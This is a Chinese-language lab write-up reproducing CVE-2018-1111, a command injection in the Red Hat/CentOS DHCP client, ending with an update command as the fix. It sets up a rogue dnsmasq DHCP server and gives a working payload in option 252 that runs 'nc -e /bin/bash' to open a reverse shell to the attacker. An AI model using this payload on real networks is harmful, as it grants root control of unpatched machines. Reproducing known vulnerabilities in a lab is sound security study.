DHCP命令執行_CVE-2018-1111漏洞復現
一、漏洞描述
在Red Hat Enterprise Linux多個版本的DHCP客戶端軟體包所包含的NetworkManager整合指令碼中發現了命令注入漏洞,攻擊者可以通過本地網路上的惡意DHCP伺服器或者使用惡意的虛假DHCP響應來利用此漏洞進行攻擊,一旦攻擊成功,則可以在配置了DHCP的NetworkManager的系統上以root許可權執行任意命令。
二、漏洞影響版本
Red hat 6.x、7.x
Centos 6.x、7.x
三、漏洞復現環境搭建
測試環境:攻擊機:kali 目標機(靶機):centos7
- 配置虛擬網路,設定僅主機模式、關閉dhcp
- 將攻擊機和靶機網路配置成僅主機模式
3.kali(攻擊機)搭建dhcp服務
3.1先在kali下設定網路(配置ip和閘道器)
3.2在當前目錄新建一個dnsmasq.conf檔案,寫入以下內容進行配置:
bind-interfaces
interface=eth0
except-interface=lo
dhcp-range=192.168.2.20,192.168.2.30,12h #dhcp-range:表示要分配給客戶機的ip地址範圍和租約時間
dhcp-option=3,192.168.2.11 #dhcp-option 表示指定給DHCP客戶端的選項資訊,3:表示設定閘道器地址選項
dhcp-option=6,192.168.2.11 #6:表示設定DNS伺服器地址選項
log-queries
log-facility=/var/log/dnsmasq.log #表示日誌記錄器
4.漏洞利用payload
dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.2.11 8888 #"
252:表示為DHCP客戶端提供了一個用於配置其代理設定的url, wpad-proxy-url
payload 中涉及到的 option 252 是私人使用保留部分的一部分, 為 dhcp 伺服器使用 252,然後在他們的瀏覽器中寫入與 dhcp 伺服器交談的能力,並要求程式碼 252 從該選項列出的 URL 中獲取關於網路上代理設定的資訊
5.kali開啟監聽
6.centos(靶機)重啟網路服務,kali接收到反彈shell
四、漏洞防禦
更新dhcp
yum -y update dhclient